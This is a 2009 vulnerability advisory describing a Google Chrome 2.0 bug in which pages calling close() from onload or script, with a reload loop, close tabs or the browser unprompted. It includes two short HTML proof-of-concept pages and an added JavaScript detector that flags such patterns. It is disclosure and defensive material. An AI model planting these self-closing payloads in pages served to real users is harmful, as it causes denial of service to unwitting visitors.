Google Chrome close() issue
VENDOR: http://www.google.com/chrome/
article = http://lostmon.blogspot.com/2009/07/google-chrome-close-issue.html
##############################
Chrome Version : 2.0.172.33 (Official Build)
URLs (if applicable) :
Other browsers tested:
Safari 4: OK
Firefox 3.x: OK
IE 7: OK
IE 8: OK
What steps will reproduce the problem?
1 - Open a web page.
2 - Navigate to another page.
Google Chrome automatically closes the tab, and if we have
only one tab, it closes the Chrome process.
What is the expected result?
Google Chrome doesn't close, or prompts before closing.
What happens instead?
Google Chrome closes the tab, or if we have only
one tab it closes too, without any confirmation.
###########
Abstract
###########
To test all of this you need an installed web server
and some patience XDD
#############
test 1
#############
Create a new html document and write in:
<html><body onload='close()'></body></html>
Save it as test1.html in c:\test\ for testing.
1.1 - Open Google Chrome and load the file through the file handler, like
file:///c:/test/test1.html
Chrome does not close the window and nothing appears...
1.2 - Open the file in a trusted intranet zone via
http://localhost/test/test1.html or via IP
http://192.168.1.100/test/test1.html
Chrome does not close the window and nothing appears...
1.3 - Open the hard disk, select c:\test\test1.html, right
click and open with Google Chrome.
Chrome opens and closes automatically.
We can change to another event, like onblur. With the onfocus event
it is interesting, because if we try to use the inspector to view
the source code, we click on the body tag and close the inspector,
and the tab is closed too. This apparently only affects the case where
we open the HTML document as in test 1.3,
so this issue apparently can't be exploited in a remote scenario.
###############
test 2
###############
Create a new HTML file, write the following inside, and save it as
test2.html in the test folder.
<html>
<head></head>
<title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title>
<body>
<script>
try { CloseCrome(); } catch(e) {
setTimeout("location.reload();",20);
close(); }
</script>
<h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2>
<p>Google Chrome :2.0.172.33 (Build oficial )<br>
WebKit 530.5<br>V8 1.1.10.13<br>
User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p>
</body>
</html>
2.1 - Open it via the file protocol handler file:///c:/test/test2.html.
Chrome does not close the window and nothing apparently appears,
but if we try to navigate to another site like www.google.com
the tab closes automatically.
2.2 - Open it from a trusted web server, http://localhost/test/test2.html
or http://192.168.1.100/test/test2.html. Chrome does not close
the window and nothing apparently appears, but if we try to navigate
to another site like www.google.com the tab closes automatically.
2.3 - Open the hard disk, select c:\test\test2.html, right
click and open with Google Chrome.
Chrome opens and closes automatically.
##############
conclusion
##############
This issue can be a vulnerability, and it can be used, for
example, to build malware that traps the browser at a
particular location: if the user tries to look at the code
(onfocus), or tries to navigate to another site (test2.html), or on
another event, the window can close without interaction. Then, if
malware, a malicious web page or a browser hijacker can
load it as the default web page, this can be a
Denial Of Service condition.
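
A static triage check for the two self-closing patterns shown in test 1 and test 2, as an added example (not the advisory author's code). The function name, the regular expressions and the benign sample page are assumptions made for illustration; the check is a heuristic and does not parse HTML or JavaScript fully.

```javascript
'use strict';
// Added example (not the advisory author's code): flags pages that call
// close() on their own window, as test1.html and test2.html do.

// close() on the window itself: bare, or via window./self./top. (not obj.close()).
const SELF_CLOSE = /(?:^|[^.\w$])(?:(?:window|self|top)\s*\.\s*)?close\s*\(\s*\)/;
// Page re-arming itself with location.reload(), as test2.html does.
const RELOAD = /\blocation\s*\.\s*reload\s*\(/;
// Inline event-handler attributes: on<event>="..." or on<event>='...'.
const HANDLER = /\s(on[a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
const SCRIPT = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;

function findSelfClose(html) {
  const findings = [];
  for (const m of html.matchAll(HANDLER)) {
    const code = m[2] !== undefined ? m[2] : m[3];
    if (SELF_CLOSE.test(code)) {
      findings.push({ kind: 'handler', event: m[1].toLowerCase(), code });
    }
  }
  for (const m of html.matchAll(SCRIPT)) {
    if (SELF_CLOSE.test(m[1])) {
      findings.push({ kind: 'script', reloadLoop: RELOAD.test(m[1]) });
    }
  }
  return findings;
}

// Inputs: test1.html and the test2.html script from the advisory, plus a
// constructed benign page whose close() calls target other objects.
const TEST1 = "<html><body onload='close()'></body></html>";
const TEST2 = '<html><body><script>\n' +
  'try { CloseCrome(); } catch(e) {\n' +
  'setTimeout("location.reload();",20);\n' +
  'close(); }\n</script></body></html>';
const BENIGN = '<button onclick="dialog.close()">x</button>' +
  '<script>socket.close(); document.close();</script>';

for (const [name, html] of [['test1', TEST1], ['test2', TEST2], ['benign', BENIGN]]) {
  console.log(name, JSON.stringify(findSelfClose(html)));
}
```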
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....